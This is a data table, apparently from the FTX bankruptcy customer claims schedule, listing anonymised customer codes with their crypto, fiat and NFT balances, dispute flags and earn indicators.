| 07396288 | | CUSDT[1], USD[0.00] | | |
| 07396291 | | BRZ[1], CUSDT[18], DOGE[1], MATIC[11.57716604], SHIB[511550.10625232], UNI[.92263296], USD[0.00], USDT[0] | Yes | |
| 07396293 | | NFT (429943577865172307/Beasts #108)[1], NFT (460319041324125112/Coachella x FTX Weekend 2 #2687)[1] | | |
| 07396296 | | BAT[93.80358867], BCH[.20224038], CUSDT[739.81620894], DOGE[547.26168958], GRT[15.47233689], KSHIB[179.87447459], LINK[2.23753302], NFT (334331951017953165/Old blood live )[1], SOL[0.17219923], TRX[1495.99109734], UNI[12.35865935], USD[0.90] | | |
| 07396300 | | CUSDT[6], DOGE[0], USD[0.00], USDT[0] | | |
| 07396303 | | ETHW[7.67672481] | Yes | |
| 07396304 | | BAT[188.20361568], BCH[.18155213], BRZ[2], BTC[.00195215], CUSDT[5], DAI[99.0053732], DOGE[3004.04435895], ETH[.06075305], ETHW[.06075305], GRT[51.50288959], LINK[3.65744609], LTC[.49164093], PAXG[.05455988], SGD[130.42], SOL[6.1125461], SUSHI[6.38606527], TRX[40365.54212721], UNI[3.98628746], USD[632.16], USDT[99.44073437], YFI[.0028799] | | |
| 07396305 | | BAT[1], BTC[0], CUSDT[1], DOGE[35], ETH[0], ETHW[0], GRT[2], TRX[6], USD[0.01], USDT[0.00027985] | | |
| 07396306 | | BTC[0], USDT[1.6759] | | |
| 07396314 | | USD[0.00] | | |
| 07396315 | | DOGE[219.27631992], TRX[228.63319872], USD[115.00], USDT[14.92804547] | | |
| 07396318 | | USD[0.01] | | |
| 07396321 | | BCH[.01383252], BTC[.00171191], DOGE[6], TRX[1], USD[5.99] | | |
| 07396328 | | BRZ[0.00011610], BTC[0], DOGE[0], GRT[0], SUSHI[0], TRX[0], UNI[0] | | |
| 07396346 | | LTC[.00639808], USD[5.72] | | |
| 07396352 | | BRZ[1], CUSDT[1], TRX[2], USD[0.05] | | |
| 07396363 | | BAT[1.0165555], BTC[0], DOGE[2], ETH[0], ETHW[0], GRT[0], TRX[1] | Yes | |
| 07396366 | | DOGE[1], ETH[.13210959], ETHW[.13210959], USD[0.01] | | |
| 07396379 | | BTC[.00005016], USD[0.87] | | |
| 07396383 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07396385 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07396389 | | BRZ[1], BTC[0], CUSDT[1], DAI[0], ETH[.08674914], ETHW[.08572746], GBP[0.00], LINK[2.75003722], SOL[0], SUSHI[0], TRX[4], UNI[0], USD[0.00], YFI[.00164186] | Yes | |
| 07396390 | | BRZ[2], BTC[.00959889], CUSDT[3], DOGE[.86128177], ETH[.09385149], ETHW[.09280503], USD[0.00] | Yes | |
| 07396398 | | GRT[251.41339077], TRX[1], USD[0.00] | | |
| 07396408 | | USD[0.12] | | |
| 07396416 | | CUSDT[3], DOGE[1.00097969], TRX[.00000334], USD[0.00] | Yes | |
| 07396418 | | DOGE[2], LINK[2.08726375], USD[0.00] | | |
| 07396422 | | BTC[.00000011], USD[2.00] | | |
| 07396424 | | BRZ[2], BTC[.00000563], CUSDT[4], DOGE[0.00265890], TRX[3], USD[2.50] | | |
| 07396427 | | CUSDT[1], DOGE[208.74798276], USD[0.00] | | |
| 07396433 | | AUD[0.00], BAT[1], BTC[0], EUR[0.00], LTC[0], TRX[2], USD[0.00] | | |
| 07396440 | | USD[0.04] | | |
| 07396443 | | DOGE[94.715], GRT[31071.5722], LINK[.02142], SUSHI[.386], USD[62.03], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07396444 | | BRZ[1], CUSDT[2], DOGE[.00001736], KSHIB[112.57323553], USD[0.00] | | |
| 07396448 | | BRZ[1], CUSDT[9], USD[0.00] | | |
| 07396449 | | BRZ[3], CUSDT[5], DOGE[4], ETH[0], SOL[0], TRX[1], USD[0.00] | | |
| 07396461 | | BTC[.00471852], DOGE[1], TRX[1], USD[206.96], USDT[1.09070202] | Yes | |
| 07396469 | | BTC[0], CUSDT[1], DOGE[0.00193230], TRX[.00138018], USD[0.00], USDT[0] | Yes | |
| 07396471 | Contingent, Disputed | CUSDT[1], DOGE[.40453056], ETH[.01031997], ETHW[.01031997], USD[0.79] | | |
| 07396483 | | BAT[0], BRZ[1], DOGE[1], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07396485 | | GRT[.1108], LINK[.029], LTC[.0072415], SOL[.044], SUSHI[.4696], TRX[.7448], UNI[.069125], USD[6.17] | | |
| 07396487 | | TRX[268.731], USD[60.09] | | |
| 07396497 | | BRZ[1], BTC[.00429452], CUSDT[6], DOGE[2.07215233], ETH[.05114815], ETHW[.05114815], GRT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07396498 | | NEAR[10.18190792], SHIB[1], USD[6.53] | Yes | |
| 07396501 | | BAT[142.19426378], BRZ[5.07865248], BTC[.12741585], CUSDT[12], DOGE[2], ETH[1.65233754], ETHW[1.65162843], SOL[2.34692164], TRX[1], USD[0.00], USDT[1.10329344] | Yes | |
| 07396502 | | TRX[0], USD[0.18] | | |
| 07396503 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07396505 | | SHIB[4773.13522089], USD[0.00] | Yes | |
| 07396510 | | USD[0.00] | Yes | |
| 07396513 | | BTC[.0103], DOGE[14], ETH[0], LINK[72.2951], SOL[2.22276], USD[0.23] | | |
| 07396515 | | BAT[351.724], BCH[.002139], BTC[0.00259998], DOGE[1567.593], ETH[.682312], ETHW[.056222], GRT[.4], KSHIB[99101.91], LINK[5.5635], LTC[1.59389787], SOL[.72792], SUSHI[.3955], UNI[.0909], USD[83.84], USDT[0], YFI[.02377] | | |
| 07396525 | | BAT[.00204997], BRZ[3], CUSDT[2], DOGE[3], LINK[4.39488273], SHIB[20150705.35555555], TRX[2], USD[0.00] | | |
| 07396527 | | LTC[.046746211], USD[0.00] | | |
| 07396533 | | BCH[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], TRX[0], USDT[0] | | |
| 07396536 | | BTC[.00005661], ETH[.0003], ETHW[.0003], USD[0.01] | | |
| 07396538 | | USD[0.00] | | |
| 07396546 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07396561 | | CUSDT[11], DOGE[4], SHIB[1], TRX[1], USD[511.11], USDT[0] | Yes | |
| 07396562 | | CUSDT[2], DOGE[11.69431475], ETH[.00000076], ETHW[.01584968], SHIB[2], SOL[0], USD[1746.18] | Yes | |
| 07396564 | | NFT (496824610349586255/The Hill by FTX #367)[1] | | |
| 07396567 | | SHIB[15664.15081561], USD[0.00] | | |
| 07396574 | | BRZ[1], CUSDT[17], DOGE[3], TRX[1], UNI[0], USD[0.67], USDT[1.09407392] | Yes | |
| 07396577 | | DOGE[2664.54570138], USD[0.00] | | |
| 07396582 | | DOGE[1463.01608028], USD[0.00] | Yes | |
| 07396584 | | BTC[0], MATIC[0], SOL[47.43387416], USD[0.00] | | |
| 07396585 | | CUSDT[1], DOGE[188.88524556], SUSHI[.00175942], USD[0.00] | | |
| 07396587 | | LINK[30.0953961], TRX[1], USD[0.00] | | |
| 07396588 | | AVAX[66.436825], USD[5.00] | | |
| 07396589 | | LINK[.00090761], SOL[0.00159907], USD[0.00] | Yes | |
| 07396595 | | BRZ[1], BTC[0], GRT[1], LINK[0] | | |
| 07396600 | | USD[0.00], USDT[0] | | |
| 07396603 | | BCH[.00015462], DOGE[69.72], USD[0.42] | | |
| 07396606 | Contingent, Disputed | BAT[1], BRZ[1], CUSDT[3], TRX[1], USD[0.00], USDT[0.99780900] | | |
| 07396608 | | BRZ[3], DOGE[9.01859444], ETH[0], SHIB[42], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07396619 | | USD[0.00] | | |
| 07396620 | | USD[0.00] | Yes | |
| 07396621 | | CUSDT[1], DOGE[1155.66085346], SHIB[1], USD[0.00] | | |
| 07396629 | | BTC[0], MATIC[1508.49], SOL[38.496], SUSHI[214.5], USD[25.46] | | |
| 07396631 | | BTC[.00000445], USD[-0.03] | | |
| 07396634 | | CUSDT[1], GRT[.43349503], USD[210.33] | | |
| 07396639 | | DOGE[943.86897028], TRX[1], USD[0.00] | | |
| 07396642 | | USD[5.00] | | |
| 07396643 | | BRZ[1], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07396649 | | CUSDT[1], LTC[5.23705533], TRX[4419.97897959], USD[0.00] | Yes | |
| 07396653 | Contingent, Disputed | BRZ[8.88563987], BTC[0.00430717], CUSDT[41], DAI[0], DOGE[21.10339435], ETH[0], GRT[1.00498957], MATIC[0], TRX[29.9337385], USD[0.00], USDT[0.00004799] | Yes | |
| 07396658 | | CUSDT[2], USD[0.01] | Yes | |
| 07396660 | | BTC[.00006598], ETH[8.688303], ETHW[8.688303], SUSHI[.4], USD[0.38], USDT[2.88000000] | | |
| 07396662 | | CUSDT[6], DOGE[3443.27133637], TRX[2], USD[0.00] | Yes | |
| 07396672 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07396675 | | USD[0.00] | | |
| 07396680 | | BAT[20.45945386], DOGE[112.41138069], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07396687 | | BRZ[3], BTC[.00000097], CUSDT[19], DOGE[2251.33007148], ETHW[.0484774], GRT[13.29798231], SHIB[456.16613563], TRX[1481.97918009], USD[0.00] | Yes | |
| 07396688 | | DOGE[.00000915], TRX[2.00001298], USD[0.72], USDT[0] | | |
| 07396690 | | BTC[0], ETH[0.00063556], ETHW[0.00063556], USD[0.00] | | |
| 07396691 | | AVAX[.00039143], DOGE[2], LINK[.00148527], NEAR[.00213746], SHIB[3], SOL[.00026876], TRX[1], USD[1.29] | Yes | |
| 07396693 | | BAT[0], BRZ[0], LINK[0], TRX[0], UNI[0], USD[0.31] | | |
| 07396695 | | CUSDT[2], DOGE[3663.1003994], LINK[6.5326431], SHIB[8244390.50651372], TRX[4080.11080282], USD[0.01] | Yes | |
| 07396699 | | DOGE[330.07624177], USD[0.00] | | |
| 07396701 | | BTC[.00010173], CUSDT[1], DOGE[8.0609301], USD[1.79] | | |
| 07396705 | | BRZ[1], BTC[.00570407], TRX[1], USD[0.00] | | |
| 07396708 | | CUSDT[1], DOGE[2], TRX[1], UNI[21.73573576], USD[0.00] | Yes | |
| 07396714 | | CUSDT[1], USD[0.00] | | |
| 07396715 | | TRX[179.8849244], USD[0.00] | | |
| 07396721 | | BAT[44.32418152], BRZ[1], BTC[.10889163], CUSDT[2], DOGE[1.00478644], LINK[16.50619190], SOL[49.63492624], SUSHI[[57.15253743], TRX[1], USD[0.00] | Yes | |
| 07396724 | | BRZ[1], BTC[.00937235], DOGE[1], ETH[.16493343], ETHW[.16493343], GRT[87.78173790], TRX[1], USD[0.00] | | |
| 07396725 | | BRZ[1], CUSDT[1], DOGE[0], GRT[0], TRX[1], USD[0.00] | Yes | |
| 07396729 | | CUSDT[4], DOGE[1.10939753], TRX[1], USD[0.01] | | |
| 07396736 | | USD[0.01], USDT[0] | | |
| 07396737 | | BAT[1], CAD[0.00], CUSDT[3], DOGE[74632068], LINK[.00004158], TRX[2.21135238], USD[0.27] | | |
| 07396742 | | BCH[.02098956], BTC[.00143167], CUSDT[82.26544145], DOGE[1322.56861319], ETH[.01331494], ETHW[.01315078], GRT[2.03184301], LINK[.38245094], LTC[.11987515], PAXG[.00632098], TRX[443.79822473], USD[0.00] | Yes | |
| 07396744 | | USD[0.50] | | |
| 07396746 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.01], USDT[0] | | |
| 07396748 | | BF_POINT[200], DOGE[1], ETH[.39659996], ETHW[.68631166], USD[0.00] | Yes | |
| 07396755 | | DOGE[1], ETH[.01912072], ETHW[.01912072], USD[0.00] | | |
| 07396756 | | CUSDT[1], USD[0.00] | | |
| 07396757 | | DOGE[18.416], SOL[.996], SUSHI[1.992], TRX[275.892], USD[0.19] | | |
| 07396758 | | CUSDT[1], DOGE[2], SHIB[4], TRX[1], USD[0.00] | Yes | |
| 07396770 | | BRZ[1], CUSDT[5], DOGE[8.56653519], GRT[1], TRX[2], USD[0.23] | | |
| 07396771 | | AAVE[0], BAT[0], BCH[0], BTC[0], CUSDT[21], DAI[.99316241], DOGE[8.13204586], ETH[0], GRT[0], LINK[.03268029], LTC[.00510629], MATIC[0], PAXG[.00051376], SHIB[1], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[0.00000013], YFI[.00002081] | Yes | |
| 07396776 | | BTC[0], USD[0.00] | | |
| 07396784 | | BAT[47.04800187], CUSDT[1], DOGE[3], GRT[47.60921291], LINK[7.49839658], LTC[1.00065327], NFT [28986029695492019/Saudi Arabia Ticket Stub #322][1], SOL[1], TRX[902.35336404], USD[0.00] | | |
| 07396786 | | CUSDT[1], USD[7.07] | | |
| 07396787 | | CUSDT[2], DOGE[1], USD[0.74] | | |
| 07396793 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07396795 | | ETH[0], SUSHI[0] | | |
| 07396801 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.01] | | |
| 07396802 | | CUSDT[108.83057822], DOGE[20.00003771], SHIB[402576.48953301], TRX[257.92392975], USD[0.00] | | |
| 07396804 | | NFT (3287589951114731981/Imola Ticket Stub #2079)[1], NFT (380102790786818911/Entrance Voucher #29385)[1], NFT (541911768160352091/Barcelona Ticket Stub #584)[1], SHIB[2], USD[0.01] | Yes | |
| 07396805 | | BRZ[1], BTC[0], CUSDT[8], DOGE[2], ETH[0], TRX[2], USD[0.00] | | |
| 07396809 | | BRZ[1], CUSDT[2], TRX[81.87441417], USD[0.00] | | |
| 07396812 | | USD[0.01] | | |
| 07396820 | | AVAX[2.30490038], DOGE[0], LINK[0], LTC[0], MATIC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07396821 | | BCH[.3748264], BRZ[1], CUSDT[1], DOGE[1096.2770558], USD[0.00] | | |
| 07396834 | | BRZ[1], CUSDT[8], DOGE[1470.83172181], LINK[7.78280339], TRX[855.85248313], USD[0.00] | Yes | |
| 07396835 | | CUSDT[4], ETH[.00029412], ETHW[.00029412], USD[0.01] | Yes | |
| 07396836 | | DOGE[1], ETH[.00000002], ETHW[0.00000001], NFT (427328831225706964/Entrance Voucher #1760)[1], SHIB[21405.34073517], USD[0.00] | Yes | |
| 07396850 | | BTC[0], ETH[0], MATIC[0], SOL[0], USD[3.35] | | |
| 07396852 | | CUSDT[1], USD[0.00] | | |
| 07396854 | | TRX[.000001], USDT[0.00009052] | | |
| 07396856 | | USD[0.01] | | |
| 07396857 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07396858 | | USD[0.00] | | |
| 07396860 | | BRZ[1], CUSDT[5], DOGE[.00776541], LINK[1.30422896], USD[0.00] | | |
| 07396863 | | BRZ[1], CUSDT[1], DOGE[1], GRT[2], SOL[1], TRX[1], USD[0.00], USDT[1] | | |
| 07396865 | | CUSDT[1], DAI[.99177657], ETH[2.24808075], ETHW[2.24713655], GRT[91.36965298], LINK[33.98293518], LTC[1.1233921], SOL[1.02048579], SUSHI[7.63027481], USD[3.50] | Yes | |
| 07396866 | | BAT[1], TRX[1], USD[2398.88] | | |
| 07396872 | | BTC[0], SOL[0], USD[0.00] | | |
| 07396874 | | BTC[.00220287], CUSDT[1], DOGE[790.02726481], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07396877 | | CUSDT[1], DOGE[3], GRT[191.36687038], USD[0.00] | | |
| 07396880 | | BTC[.0000576], DOGE[.878], ETH[.00000001], LINK[.0671], LTC[.00724316], SOL[.00267], USD[1.46], USDT[.000503] | | |
| 07396881 | | CUSDT[7], USD[0.00] | | |
| 07396883 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07396886 | | DOGE[5539.33607183], GRT[0], LINK[0], NFT (323804820049889739/Four Elements)[1], NFT (336874523614704537/Sand Daisy Redux 2)[1], NFT (381550444601715956/Vegas burger )[1], TRX[0], USD[0.00] | Yes | |
| 07396888 | | CUSDT[13], DOGE[25.6437055], ETHW[.02747193], MKR[.04261041], TRX[2], USD[0.01], YFI[.00571042] | Yes | |
| 07396889 | | CUSDT[5], DOGE[1], USD[0.00] | | |
| 07396896 | | BTC[.00001162], ETH[0.00064016], ETHW[0.00064016], USD[0.00], USDT[1656.48182293] | | |
| 07396898 | | USD[11.02] | Yes | |
| 07396899 | | USD[0.00] | | |
| 07396904 | | BRZ[1], USD[0.00] | | |
| 07396906 | | BRZ[1], DOGE[2], GRT[1.00498957], USD[0.00] | Yes | |
| 07396917 | | CUSDT[4], DOGE[5], TRX[2104.08315114], USD[0.00] | | |
| 07396920 | | USD[0.01] | | |
| 07396926 | | USD[150.00] | | |
| 07396940 | | TRX[2], USD[0.00] | | |
| 07396941 | | CUSDT[3], DOGE[1], TRX[2968.31347637], USD[1.00] | | |
| 07396945 | | MATIC[0], SOL[0], USD[0.00], YFI[0] | | |
| 07396959 | | ETH[0], MATIC[.50286562], UNI[.00365608], USD[0.04], USDT[0] | | |
| 07396961 | | SUSHI[.00130618], USD[0.00] | | |
| 07396962 | | BRZ[2], CUSDT[5], DOGE[0], KSHIB[659.52587153], SHIB[1], SUSHI[1.50382611], TRX[1], USD[0.00], USDT[0] | | |
| 07396964 | | BAT[.00046525], DOGE[5], LINK[1.74921569], USD[0.00] | | |
| 07396966 | | TRX[1], USD[0.00] | | |
| 07396971 | | CUSDT[6], DOGE[1577.31741878], GRT[1], USD[0.00] | | |
| 07396972 | | BTC[0], USD[0.00], USDT[0] | | |
| 07396974 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07396985 | | USD[0.01], USDT[0.00031721] | | |
| 07396990 | | CUSDT[2], DOGE[348.84045221], SHIB[2402377.58558439], USD[0.00] | | |
| 07396993 | | USD[0.99] | | |
| 07396997 | | BTC[.00021463], SOL[61.97871191], USD[0.01] | | |
| 07396999 | | BAT[1], BRZ[3], BTC[.00026881], CUSDT[27], ETH[.00102433], ETHW[3.56231175], GRT[1], SHIB[23], SOL[.00130313], TRX[22.95449164], USD[0.00] | Yes | |
| 07397006 | | CUSDT[1], DOGE[1.32700002], USD[0.21] | | |
| 07397010 | | BRZ[2], CUSDT[2], DOGE[1589.91617583], ETH[.77399258], ETHW[.77366736], GRT[1], SOL[13.12365827], TRX[10335.98795642], UNI[6.48205458], USD[0.00] | Yes | |
| 07397015 | | BRZ[1], CUSDT[8], SHIB[7], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07397016 | | USD[9.00] | | |
| 07397023 | | SOL[0], USD[0.00], USDT[0.00000119] | | |
| 07397024 | | LINK[15] | | |
| 07397027 | | SUSHI[.467], USD[500.00] | | |
| 07397031 | | USD[0.00] | | |
| 07397042 | | USD[0.00] | | |
| 07397046 | | USD[0.00] | | |
| 07397058 | | DOGE[1], ETH[.0001766], ETHW[.0001766], USD[0.00] | | |
| 07397059 | | SHIB[81854481.44398756], USD[0.00] | | |
| 07397078 | | BTC[0], CUSDT[6], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0.00043620] | | |
| 07397079 | | BRZ[0], DOGE[38.57161813], USD[0.01] | | |
| 07397080 | | DOGE[.547], ETH[.00074192], ETHW[0.00074191], LTC[.00590438], USD[0.00] | | |
| 07397081 | | CUSDT[3], DOGE[.27464121], TRX[3], USD[0.00] | Yes | |
| 07397085 | | BCH[.75556799], BRZ[3], CUSDT[3], DOGE[606.45763141], TRX[6], USD[532.88] | | |
| 07397087 | | BTC[0.40427324], DOGE[97860.2264], LINK[131.764], LTC[4.86287], PAXG[.3942168], SHIB[30069900], SOL[542.66238], SUSHI[1027.5239], USD[82.89], USDT[5.16228] | | |
| 07397095 | | DOGE[1], SOL[5.20212824], USD[0.00] | | |
| 07397100 | | ETHW[.000496], LTC[0], USD[0.00] | | |
| 07397101 | | BRZ[1], CUSDT[1], DOGE[1.18105896], GRT[.00003888], USD[0.00] | | |
| 07397106 | | CUSDT[15], DOGE[2301.31034297], ETH[.0153889], ETHW[.01519738], TRX[2], USD[0.00] | Yes | |
| 07397109 | | USD[0.01] | Yes | |
| 07397117 | | BTC[.00000581], DOGE[0], USD[0.07] | | |
| 07397119 | | BCH[.002301], BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07397121 | | CUSDT[1], DOGE[1], USD[0.76] | | |
| 07397123 | | DOGE[1], ETH[0.00000001], LTC[1.02622915], MATIC[24.71649241], SHIB[5], TRX[161.16241685], USD[0.00], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07397124 | | AAVE[0], BRZ[1], DAI[0.01390226], DOGE[0], ETH[0.00000219], ETHW[0.00000219], MATIC[0], MKR[0], PAXG[0], SHIB[3], SOL[0], USD[0.02], USDT[0] | Yes | |
| 07397132 | | DOGE[1.64687173], USD[0.09] | | |
| 07397134 | | LTC[1] | | |
| 07397140 | | USD[2.21], USDT[14.62303677] | | |
| 07397141 | | USD[500.00] | | |
| 07397143 | | CUSDT[1], LINK[10.78922376], USD[0.00] | Yes | |
| 07397144 | | BRZ[1], DOGE[1], USD[0.00] | Yes | |
| 07397160 | | BTC[0], SOL[0], USD[0.00] | | |
| 07397173 | | BAT[2.09997265], BRZ[1], BTC[.25193786], CUSDT[1], DOGE[12949.60174724], ETH[1.37306717], ETHW[1.37249062], GRT[1.00391813], LTC[12.29519926], SHIB[1], TRX[8926.81452938], USD[1.30] | Yes | |
| 07397175 | | BAT[1.01018667], BRZ[1], BTC[.3136388], CUSDT[11], DOGE[6.17222878], ETH[1.9797974], ETHW[1.97897901], GRT[1], SOL[42.88019832], TRX[6], USD[0.00], USDT[1.09380134] | Yes | |
| 07397176 | | LINK[.05874985], SOL[.99179942], USD[34.00], USDT[.99400998] | | |
| 07397178 | | USD[1.75] | | |
| 07397179 | | CUSDT[1], DOGE[1877.55640858], ETH[.33649807], ETHW[.33649807], KSHIB[1533.4676242], TRX[1], USD[0.00] | | |
| 07397189 | | BRZ[1], CUSDT[3], DOGE[1.35502601], TRX[2], USD[0.00] | | |
| 07397192 | | USD[0.01] | | |
| 07397193 | | DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0.00013248] | Yes | |
| 07397197 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07397200 | | GRT[.4928], SUSHI[.1345], USD[14287.77] | | |
| 07397206 | | BTC[0] | | |
| 07397207 | | BTC[0], SOL[0], SUSHI[0] | | |
| 07397209 | | NEAR[46.2537], SHIB[1], USD[0.00] | | |
| 07397210 | | AAVE[.0000004], BAT[.00042552], BCH[0.00000022], BTC[.00000001], CUSDT[0.02821480], DOGE[2.00031065], ETH[0.00000003], ETHW[0.00363532], GRT[0], LINK[.00000432], LTC[.00000082], MKR[.00000004], PAXG[0.00000109], SHIB[9], SOL[0.00002442], TRX[0.00288776], USD[0.01], USDT[0.00011067], YFI[0] | Yes | |
| 07397214 | | ETH[.034], ETHW[.034], USD[0.81] | | |
| 07397215 | | CUSDT[1], DOGE[635.57497464], USD[0.00] | | |
| 07397233 | | BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07397239 | | USD[0.42], USDT[0.00000001] | | |
| 07397241 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07397242 | | CUSDT[.00995244], DOGE[.00009635], USD[0.01] | Yes | |
| 07397254 | | BRZ[2], DOGE[2889.56144949], SUSHI[5.99300143], TRX[3], USD[0.00], USDT[1] | | |
| 07397260 | | DOGE[.255], USD[0.90] | | |
| 07397262 | | USD[0.00] | Yes | |
| 07397263 | | ETH[.009], ETHW[.00999], MATIC[0], USD[31.24] | | |
| 07397269 | | AAVE[10.34081014], BRZ[3], BTC[.00001332], DOGE[13.27669571], ETH[.00020927], ETHW[34.71698529], GRT[.00000001], LINK[95.43494816], NFT [393521777154453536/Entrance Voucher #1728][1], SHIB[10362399.37617916], TRX[1], UNI[.005318], USD[0.00], USDT[0.00076524] | Yes | |
| 07397270 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07397271 | | BAT[1], BRZ[6], CUSDT[8], DOGE[956.13204691], ETH[.02138454], ETHW[.02138454], GRT[2], LTC[1.48175355], SHIB[1], USD[0.00], USDT[1] | | |
| 07397275 | | BRZ[1], CUSDT[3], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07397279 | | CUSDT[2], ETH[.01888286], ETHW[.01888286], USD[0.03] | | |
| 07397280 | | BRZ[1], CUSDT[2], SOL[0], TRX[2], USD[0.56] | | |
| 07397281 | | BRZ[3], CUSDT[3], DOGE[1], LTC[0], SHIB[1], TRX[5440.02491465], USD[0.01], YFI[.00000008] | Yes | |
| 07397282 | | BTC[.00914211], DOGE[109.34880712], ETH[.57999865], ETHW[.57975494], TRX[2], USD[0.00] | Yes | |
| 07397285 | | DOGE[1.51927763], USD[0.00] | | |
| 07397289 | | BAT[2], CUSDT[47418.47817729], DOGE[37771.81893954], TRX[9204.08808194], USD[2239.00], USDT[1] | | |
| 07397293 | | BAT[3], DOGE[8750.14503365], ETH[.81343007], ETHW[.81343007], LINK[1], SHIB[1], SUSHI[307.35128111], TRX[3], USD[3295.15], USDT[2] | | |
| 07397310 | | DOGE[14494.98433916], ETH[0], USD[0.00] | Yes | |
| 07397313 | | BTC[.0000221], NFT [460826473437870121/Megalodon Rogue Shark Tooth][1] | | |
| 07397318 | | USD[100.00] | | |
| 07397320 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07397321 | | BTC[.00005], USD[1389.89], USDT[.0058992] | | |
| 07397322 | | BTC[.00115], CUSDT[3], DOGE[1000.9725273], USD[0.61] | | |
| 07397325 | | BAT[64.39136251], BRZ[2], BTC[.00522238], CUSDT[1765.64813355], DOGE[2928.67869532], ETH[.06953554], ETHW[.06953554], SHIB[274644.79273472], TRX[433.3488925], USD[3.00], USDT[83.3315846] | | |
| 07397331 | | CUSDT[12], DAI[0], DOGE[0], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0.00000001] | | |
| 07397333 | | CUSDT[1], DOGE[.48955683], USD[0.34] | | |
| 07397334 | | BRZ[1], CUSDT[4], DOGE[3], ETH[.00000087], ETHW[.00000087], SOL[.40713697], USD[0.00], USDT[0.00546480] | Yes | |
| 07397340 | | DOGE[1], USD[0.00] | Yes | |
| 07397345 | | BRZ[3], CUSDT[15], DOGE[1.48566334], GRT[1.00367791], TRX[2], USD[0.01], USDT[0.47200060] | Yes | |
| 07397346 | | CUSDT[4], DOGE[1], MATIC[.64810151], NFT [302327074792822454/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #62][1], NFT [328666199758349522/Mad Mike][1], NFT [365770131879083656/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #84][1], NFT [395256471698648407/CryptoAvatar #111][1], NFT [536108946687351315/Hall of Fantasy League #183][1], SHIB[6], TRX[0], USD[1.05], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07397352 | | BTC[.00022602], ETH[.00148353], ETHW[.00146985], UNI[.204711], USD[0.50], USDT[2.20194186] | Yes | |
| 07397357 | | BAT[1.01655549], CUSDT[7], DOGE[0], ETH[0.17388462], ETHW[0.17362068], SHIB[1], TRX[551.57624288], USD[0.00] | Yes | |
| 07397362 | | CUSDT[4], ETHW[.03058314], TRX[2], USD[0.00] | | |
| 07397365 | | DOGE[6], TRX[2], USD[0.03] | | |
| 07397367 | | DOGE[41.92538583], ETH[0.00846403], ETHW[0.00835459], SHIB[24065.87834293], TRX[2], USD[5.80] | | |
| 07397368 | | BAT[1], BRZ[2], CUSDT[7], DOGE[10.61615229], SHIB[2], TRX[4], USD[1.79] | | |
| 07397369 | | BF_POINT[300], BRZ[19.39199027], ETHW[24.24711133], LINK[.00233823], LTC[.00005103], MATIC[.01948792], NFT [33065459448802826/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #24][1], NFT [333142223406996384/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #27][1], NFT [384559543982535621/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #32][1], NFT [434067693863620628/Entrance Voucher #2752][1], NFT [459726828684928056/Founding Frens Investor #621][1], NFT [554742686239298817/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #28][1], SHIB[287414.28047576], SOL[.00000001], UNI[.00000001], USD[8503.69], USDT[0.00000001] | Yes | |
| 07397373 | | CUSDT[4], DAI[9.90548194], DOGE[3067.64973063], GRT[4.35850421], TRX[184.77532613], USD[0.00] | | |
| 07397374 | | BRZ[3], CUSDT[6], DOGE[5], ETHW[.32278288], SUSHI[.00002763], TRX[4], USD[2277.06] | | |
| 07397381 | | BRZ[1], CUSDT[17], DOGE[.77962063], SHIB[1], TRX[6], USD[65.11] | Yes | |
| 07397396 | | CUSDT[5], USD[0.00] | | |
